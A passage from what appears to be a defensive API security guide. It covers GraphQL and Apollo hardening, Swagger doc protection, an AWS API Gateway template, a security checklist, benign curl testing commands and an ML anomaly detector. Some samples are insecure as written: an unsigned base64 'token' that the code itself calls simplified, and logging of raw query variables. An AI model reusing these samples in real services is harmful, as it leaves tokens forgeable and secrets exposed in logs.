users: isAdmin,
},
Mutation: {
createUser: and(isAuthenticated, isValidEmail, isStrongPassword),
updateUser: and(isAuthenticated, isValidEmail),
deleteUser: and(isAuthenticated, isAdmin),
},
});
// Create executable schema with permissions middleware
const schema = makeExecutableSchema({ typeDefs, resolvers });
const schemaWithMiddleware = applyMiddleware(schema, permissions);
GraphQL Specific Security
// Apollo Server configuration with security measures
const { ApolloServer } = require('apollo-server-express');
const server = new ApolloServer({
typeDefs,
resolvers,
context: ({ req }) => {
// Authentication context
const token = req.headers.authorization || '';
const user = getUser(token); // Your auth function
return { user };
},
validationRules: [
// Query complexity analysis
require('graphql-validation-complexity').createComplexityLimitRule(1000),
// Query depth limit
require('graphql-depth-limit')(10),
],
plugins: [
// Logging plugin for security monitoring
{
requestDidStart(requestContext) {
return {
didEncounterErrors(errorContext) {
console.error('GraphQL errors:', errorContext.errors);
},
willSendResponse(responseContext) {
const { operationName, query, variables } = responseContext.request;
console.log(`Operation: ${operationName}`, {
query,
variables,
user: responseContext.context.user?.id || 'anonymous',
});
},
};
},
},
],
// Disable introspection in production
introspection: process.env.NODE_ENV !== 'production',
// Disable GraphQL Playground in production
playground: process.env.NODE_ENV !== 'production',
});
Secure API Documentation
// Express configuration with secure Swagger docs
const express = require('express');
const swaggerUi = require('swagger-ui-express');
const YAML = require('yamljs');
const swaggerDocument = YAML.load('./swagger.yaml');
const app = express();
// Only expose Swagger docs in non-production
if (process.env.NODE_ENV !== 'production') {
app.use('/api-docs', swaggerUi.serve, swaggerUi.setup(swaggerDocument));
} else {
// In production, secure the docs with authentication
app.use('/api-docs', (req, res, next) => {
// Basic authentication check
const auth = req.headers.authorization;
if (!auth || !auth.startsWith('Basic ')) {
res.set('WWW-Authenticate', 'Basic realm="API Documentation"');
return res.status(401).send('Authentication required');
}
// Decode credentials
const credentials = Buffer.from(auth.split(' ')[1], 'base64').toString('utf-8');
const [username, password] = credentials.split(':');
// Check against environment variables
if (username === process.env.DOCS_USERNAME &&
password === process.env.DOCS_PASSWORD) {
return next();
}
res.status(401).send('Invalid credentials');
}, swaggerUi.serve, swaggerUi.setup(swaggerDocument));
}
API Gateway Security Configuration
# AWS API Gateway CloudFormation Template Example
Resources:
ApiGateway:
Type: AWS::ApiGateway::RestApi
Properties:
Name: SecureAPI
Description: Secure API with proper authentication and rate limiting
EndpointConfiguration:
Types:
- REGIONAL
ApiKey:
Type: AWS::ApiGateway::ApiKey
Properties:
Name: SecureAPIKey
Description: API Key for client authentication
Enabled: true
UsagePlan:
Type: AWS::ApiGateway::UsagePlan
Properties:
UsagePlanName: StandardUsagePlan
Description: Standard usage plan with rate limiting
Quota:
Limit: 10000
Period: MONTH
Throttle:
RateLimit: 10
BurstLimit: 20
ApiStages:
- ApiId: !Ref ApiGateway
Stage: !Ref ApiStage
UsagePlanKey:
Type: AWS::ApiGateway::UsagePlanKey
Properties:
KeyId: !Ref ApiKey
KeyType: API_KEY
UsagePlanId: !Ref UsagePlan
ApiGatewayAuthorizer:
Type: AWS::ApiGateway::Authorizer
Properties:
Name: CognitoAuthorizer
Type: COGNITO_USER_POOLS
IdentitySource: method.request.header.Authorization
RestApiId: !Ref ApiGateway
ProviderARNs:
- !GetAtt UserPool.Arn
ApiMethod:
Type: AWS::ApiGateway::Method
Properties:
HttpMethod: POST
ResourceId: !GetAtt ApiGateway.RootResourceId
RestApiId: !Ref ApiGateway
ApiKeyRequired: true
AuthorizationType: COGNITO_USER_POOLS
AuthorizerId: !Ref ApiGatewayAuthorizer
MethodResponses:
- StatusCode: 200
- StatusCode: 400
- StatusCode: 401
- StatusCode: 403
- StatusCode: 500
API Security Checklist
Use this comprehensive checklist to secure your APIs:
- Authentication
- [ ] Use standard authentication (OAuth2, JWT, API keys)
- [ ] Implement proper token validation
- [ ] Set short expiration times for tokens
- [ ] Rotate credentials and keys regularly
- [ ] Secure credential storage (use KMS, Vault, etc.)
- [ ] Implement MFA for sensitive operations
- Authorization
- [ ] Implement principle of least privilege
- [ ] Use Role-Based Access Control (RBAC)
- [ ] Consider Attribute-Based Access Control (ABAC) for complex permissions
- [ ] Validate resource ownership on all endpoints
- [ ] Apply authorization at both API gateway and service levels
- Input Validation
- [ ] Validate all input parameters (type, format, range)
- [ ] Implement schema validation for request bodies
- [ ] Sanitize inputs to prevent injection attacks
- [ ] Use a whitelist approach for input validation
- Output Control
- [ ] Implement response filtering based on user permissions
- [ ] Remove sensitive data from responses
- [ ] Use consistent error messages that don't leak information
- [ ] Consider implementing field-level security
- Rate Limiting and Quotas
- [ ] Implement rate limiting per user/API key
- [ ] Set quotas for resource-intensive operations
- [ ] Use exponential backoff for repeated failures
- [ ] Monitor for and alert on abnormal request patterns
- Logging and Monitoring
- [ ] Log all API access with appropriate detail
- [ ] Include correlation IDs for request tracing
- [ ] Monitor for unusual activity patterns
- [ ] Implement alerts for security-related events
- [ ] Ensure logs are tamper-proof and preserved for auditing
- Transport Security
- [ ] Use TLS 1.2+ for all API traffic
- [ ] Implement proper certificate validation
- [ ] Use strong cipher suites
- [ ] Consider mutual TLS for high-security environments
- [ ] Implement HSTS headers
- API Design
- [ ] Follow RESTful conventions or GraphQL best practices
- [ ] Use resource-based URLs and appropriate HTTP methods
- [ ] Implement proper HTTP status codes
- [ ] Version your APIs
- [ ] Use nouns for resources, not verbs
- Infrastructure Security
- [ ] Keep all components updated with security patches
- [ ] Use a Web Application Firewall (WAF)
- [ ] Implement network segmentation
- [ ] Consider containerization for isolation
- [ ] Run regular vulnerability scans
- Documentation and Testing
- [ ] Document security requirements and controls
- [ ] Perform regular security testing
- [ ] Conduct penetration testing
- [ ] Include security in CI/CD pipeline
- [ ] Maintain a responsible disclosure program
Common Pitfalls & Troubleshooting
API Testing Challenges
Challenge | Description | Solution |
---|---|---|
Authentication Complexity | Modern APIs use complex auth flows like OAuth2 | Use specialized tools like Postman's auth helpers or write custom auth scripts |
Maintaining State | Tests require maintaining session state | Create proper setup/teardown flows to manage state between tests |
Rate Limiting | API defenses block excessive testing | Implement delays between requests, distribute testing, obtain higher rate limits for testing |
Dynamic Endpoints | API endpoints change based on data or UUIDs | Create discovery flows that find valid IDs before testing endpoints |
API Gateway Complexity | Multiple layers of protection in modern APIs | Test each layer independently before testing the entire stack |
Troubleshooting Common Issues
When API testing fails, follow this systematic approach:
1. Authentication Issues
# Check if your token is valid
curl -I "https://api.example.com/health" \
-H "Authorization: Bearer YOUR_TOKEN"
# If you get a 401/403, refresh your token
curl -X POST "https://auth.example.com/token" \
-d "grant_type=refresh_token&refresh_token=YOUR_REFRESH_TOKEN"
2. Input Validation Problems
// Common causes of validation errors:
// 1. Incorrect data types
const data = {
userId: "123", // Should be numeric: 123
amount: "50.5", // Should be numeric: 50.5
active: "true" // Should be boolean: true
};
// 2. Missing required fields
const incompleteData = {
// Missing required 'email' field
name: "John Doe",
role: "user"
};
// 3. Value outside acceptable range
const invalidRangeData = {
age: -5, // Should be positive
percentage: 120 // Should be 0-100
};
// Fix: Properly validate local data before sending
const validateUserData = (data) => {
const errors = [];
if (!data.email) errors.push("Email is required");
if (typeof data.age !== 'number' || data.age < 0) errors.push("Age must be a positive number");
// Add more validations...
return errors.length ? errors : null;
};
3. Rate Limiting Detection and Handling
def handle_rate_limits(response, retry_after_default=60):
"""Handle rate limit responses with appropriate backoff"""
if response.status_code == 429:
# Try to get retry time from headers
retry_after = response.headers.get('Retry-After')
wait_time = int(retry_after) if retry_after and retry_after.isdigit() else retry_after_default
print(f"Rate limited. Waiting {wait_time} seconds before retry.")
time.sleep(wait_time)
return True
# Also check for custom rate limit headers
remaining = response.headers.get('X-RateLimit-Remaining')
if remaining and int(remaining) < 5:
print(f"Almost rate limited ({remaining} requests left). Adding delay.")
time.sleep(2) # Add small delay when close to limit
return False
4. Diagnosing Request/Response Issues
// Create a debugging proxy for API calls
const axios = require('axios');
// Create a debugging wrapper around axios
const debugAxios = axios.create();
// Add request interceptor
debugAxios.interceptors.request.use(request => {
console.log('──────────────── REQUEST ────────────────');
console.log('URL:', request.url);
console.log('Method:', request.method.toUpperCase());
console.log('Headers:', JSON.stringify(request.headers, null, 2));
if (request.data) {
console.log('Body:', typeof request.data === 'object' ?
JSON.stringify(request.data, null, 2) : request.data);
}
return request;
}, error => {
console.error('Request Error:', error);
return Promise.reject(error);
});
// Add response interceptor
debugAxios.interceptors.response.use(response => {
console.log('──────────────── RESPONSE ────────────────');
console.log('Status:', response.status, response.statusText);
console.log('Headers:', JSON.stringify(response.headers, null, 2));
console.log('Body:', typeof response.data === 'object' ?
JSON.stringify(response.data, null, 2) : response.data);
return response;
}, error => {
if (error.response) {
console.log('──────────────── ERROR RESPONSE ────────────────');
console.log('Status:', error.response.status, error.response.statusText);
console.log('Headers:', JSON.stringify(error.response.headers, null, 2));
console.log('Body:', typeof error.response.data === 'object' ?
JSON.stringify(error.response.data, null, 2) : error.response.data);
} else {
console.error('Response Error:', error.message);
}
return Promise.reject(error);
});
// Use the debugging axios for API calls
debugAxios.get('https://api.example.com/users')
.then(response => {
// Process the response
})
.catch(error => {
// Handle errors
});
When Your Tools Fail: Manual API Testing
When automated tools fail, these manual techniques can help:
# Base curl commands for manual testing
# 1. Basic GET request
curl -v "https://api.example.com/endpoint"
# 2. POST with JSON
curl -v -X POST "https://api.example.com/users" \
-H "Content-Type: application/json" \
-d '{"name": "Test User", "email": "test@example.com"}'
# 3. Test with custom headers
curl -v "https://api.example.com/protected-resource" \
-H "Authorization: Bearer test-token" \
-H "X-Custom-Header: Value"
# 4. Test for CORS issues
curl -v -X OPTIONS "https://api.example.com/users" \
-H "Origin: https://example.org" \
-H "Access-Control-Request-Method: POST" \
-H "Access-Control-Request-Headers: Content-Type, Authorization"
# 5. Test with client certificate
curl -v "https://api.example.com/secure-endpoint" \
--cert ./client.crt \
--key ./client.key
Future of API Security
Emerging Trends in API Security
- Zero Trust API Security Models
- Every API request is fully authenticated and authorized
- Continuous validation throughout the request lifecycle
- Micro-segmentation and granular access controls
- ML-Based API Anomaly Detection
- Learning normal API usage patterns
- Detecting anomalous behavior automatically
- Predicting and preventing zero-day attacks
- API Security in Serverless Architectures
- Function-level security policies
- Event-driven security models
- Ephemeral execution environments
- Continuous API Security Testing
- API security built into CI/CD pipelines
- Automated vulnerability scanning before deployment
- Runtime self-testing and adaptation
Advanced API Attack and Defense Techniques
# Example: Next-gen API security using ML for request analysis
import numpy as np
import pandas as pd
from sklearn.ensemble import IsolationForest
import joblib
import time
class APIAnomalyDetector:
def __init__(self, model_path=None, training_data_path=None):
self.model = None
self.feature_columns = [
'request_size', 'num_parameters', 'response_time',
'status_code', 'hour_of_day', 'is_authenticated',
'parameter_entropy', 'repeated_parameters'
]
if model_path:
self.load_model(model_path)
elif training_data_path:
self.train_model(training_data_path)
def extract_features(self, request, response):
"""Extract features from request and response"""
features = {}
# Request features
features['request_size'] = len(request.get('body', ''))
features['num_parameters'] = len(request.get('params', {}))
features['is_authenticated'] = 1 if 'authorization' in request.get('headers', {}) else 0
# Calculate parameter entropy (randomness)
if request.get('params'):
param_values = ''.join(str(v) for v in request['params'].values())
features['parameter_entropy'] = self._calculate_entropy(param_values)
else:
features['parameter_entropy'] = 0
# Check for repeated parameters (potential fuzzing)
features['repeated_parameters'] = self._count_repeated_params(request.get('params', {}))
# Response features
features['response_time'] = response.get('time', 0)
features['status_code'] = response.get('status_code', 0)
# Time-based features
features['hour_of_day'] = time.localtime().tm_hour
return features
def _calculate_entropy(self, string_data):
"""Calculate Shannon entropy of a string"""
if not string_data:
return 0
# Calculate frequency of each character
freq = {}
for c in string_data:
freq[c] = freq.get(c, 0) + 1
# Calculate entropy
entropy = 0
for count in freq.values():
probability = count / len(string_data)
entropy -= probability * np.log2(probability)
return entropy
def _count_repeated_params(self, params):
"""Count parameters that appear to be repetitions or fuzzing"""
if not params:
return 0
# Look for similar parameter names (e.g., id1, id2, id3...)
param_prefixes = {}
for name in params.keys():
# Extract alphabetic prefix
prefix = ''.join(c for c in name if c.isalpha())
if prefix:
param_prefixes[prefix] = param_prefixes.get(prefix, 0) + 1
# Count parameters with same prefix
repeated = sum(count > 1 for count in param_prefixes.values())
return repeated
def train_model(self, training_data_path):
"""Train anomaly detection model"""
# Load training data
df = pd.read_csv(training_data_path)
# Make sure we have the right columns
for col in self.feature_columns:
if col not in df.columns:
raise ValueError(f"Training data missing required column: {col}")
# Prepare features
X = df[self.feature_columns].values
# Train isolation forest model
self.model = IsolationForest(
n_estimators=100,
max_samples='auto',
contamination=0.01, # Assume 1% of training data is anomalous
random_state=42
)
self.model.fit(X)
def save_model(self, model_path):
"""Save trained model"""
if self.model:
joblib.dump(self.model, model_path)
def load_model(self, model_path):
"""Load trained model"""
self.model = joblib.load(model_path)
def predict(self, request, response):
"""Predict if a request/response is anomalous"""
if not self.model:
raise ValueError("Model not trained or loaded")
# Extract features
features = self.extract_features(request, response)
# Convert to array in the right order
X = np.array([[features[col] for col in self.feature_columns]])
# Predict (-1 for anomaly, 1 for normal)
prediction = self.model.predict(X)[0]
# Get anomaly score
score = self.model.decision_function(X)[0]
return {
'is_anomaly': prediction == -1,
'anomaly_score': score,
'features': features
}
Decentralized API Security
// Example: Decentralized API authentication using Web3
const ethers = require('ethers');
const crypto = require('crypto');
class Web3APIAuth {
constructor(providerUrl) {
this.provider = new ethers.providers.JsonRpcProvider(providerUrl);
}
/**
* Generate a challenge for the client to sign
*/
generateChallenge(address) {
const timestamp = Date.now();
const randomBytes = crypto.randomBytes(16).toString('hex');
const message = `Authenticate with API: ${randomBytes} at ${timestamp}`;
// Store challenge for verification (in a database in production)
this.pendingChallenges = this.pendingChallenges || {};
this.pendingChallenges[address] = {
message,
timestamp,
expires: timestamp + 5 * 60 * 1000 // 5 minutes
};
return {
address,
message,
timestamp
};
}
/**
* Verify a signed challenge
*/
async verifySignature(address, signature) {
// Check if we have a pending challenge
if (!this.pendingChallenges || !this.pendingChallenges[address]) {
throw new Error('No pending challenge found for this address');
}
const challenge = this.pendingChallenges[address];
// Check if challenge has expired
if (Date.now() > challenge.expires) {
delete this.pendingChallenges[address];
throw new Error('Challenge has expired');
}
try {
// Recover the address from the signature
const recoveredAddress = ethers.utils.verifyMessage(
challenge.message,
signature
);
// Check if recovered address matches the claimed address
if (recoveredAddress.toLowerCase() !== address.toLowerCase()) {
throw new Error('Signature verification failed');
}
// Cleanup
delete this.pendingChallenges[address];
// Get ENS name if available
let ensName = null;
try {
ensName = await this.provider.lookupAddress(address);
} catch (error) {
console.log('ENS lookup failed:', error.message);
}
// Return authentication result
return {
authenticated: true,
address,
ensName,
timestamp: Date.now()
};
} catch (error) {
throw new Error(`Signature verification failed: ${error.message}`);
}
}
/**
* Generate a JWT or similar token after successful authentication
*/
generateToken(authResult) {
// In a real implementation, this would create a JWT or similar token
// Simplified for example purposes
const payload = {
sub: authResult.address,
name: authResult.ensName || authResult.address.substring(0, 10),
iat: Math.floor(Date.now() / 1000),
exp: Math.floor(Date.now() / 1000) + (60 * 60) // 1 hour
};
// Sign the payload (would use a proper JWT library in production)
const token = Buffer.from(JSON.stringify(payload)).toString('base64');
return {
token,
expires_in: 3600,
token_type: 'Bearer'
};
}
}
// Example usage in Express
const express = require('express');
const app = express();
app.use(express.json());
const auth = new Web3APIAuth('https://mainnet.infura.io/v3/YOUR_INFURA_KEY');
// Challenge generation endpoint
app.post('/api/auth/challenge', (req, res) => {
const { address } = req.body;
if (!address || !ethers.utils.isAddress(address)) {
return res.status(400).json({ error: 'Invalid Ethereum address' });
}
const challenge = auth.generateChallenge(address);
res.json(challenge);
});
// Authentication endpoint
app.post('/api/auth/verify', async (req, res) => {
const { address, signature } = req.body;
if (!address || !signature) {
return res.status(400).json({ error: 'Missing address or signature' });
}
try {
const authResult = await auth.verifySignature(address, signature);
const tokenResponse = auth.generateToken(authResult);
res.json(tokenResponse);
} catch (error) {
res.status(401).json({ error: error.message });
}
});
app.listen(3000, () => {
console.log('Web3 API auth server running on port 3000');
});
Key Takeaways & Resources
API Security Core Principles
- Defense in Depth: Implement multiple layers of security controls
- Least Privilege: Provide minimum access necessary for functionality
- Zero Trust: Verify every request regardless of source
- Secure by Design: Build security into APIs from the beginning
- Continuous Validation: Constantly test and verify security controls
Essential API Security Tools
- Postman: API testing and documentation
- OWASP ZAP: Security testing for APIs
- Burp Suite: Professional penetration testing
- Insomnia: API client with security testing features
- MitmProxy: Intercepting proxy for API analysis
- APIKit: Custom API security testing framework
- TnT-Fuzzer: API fuzzing tool
- Astra: REST API security testing automation
Recommended Resources
- Standards and Guidelines:
- OWASP API Security Top 10
- NIST Special Publication 800-95 (Guide to Secure Web Services)
- API Security Best Practices by APISecurity.io
- Books:
- "API Security in Action" by Neil Madden
- "Hacking APIs" by Corey Ball
- "Designing Web APIs" by Brenda Jin, Saurabh Sahni, and Amir Shevat
- Online Courses:
- API Security on Pluralsight
- Web Services & API Security on Coursera
- Advanced API Security on Udemy
- Practice Environments:
- OWASP Juice Shop
- DVWS (Damn Vulnerable Web Services)
- VAmPI (Vulnerable API)
Key Takeaways
- Comprehensive Testing: Apply structured methodology across all APIs
- Automate Security: Build security tests into CI/CD pipeline
- Know Your Data: Understand data sensitivity and protect accordingly
- Monitor Everything: Establish robust logging and monitoring
- Stay Updated: API security threats evolve rapidly
Remember: API security is a continuous process, not a one-time task. Regular assessments, continuous monitoring, and staying current with emerging threats are essential for maintaining a strong security posture.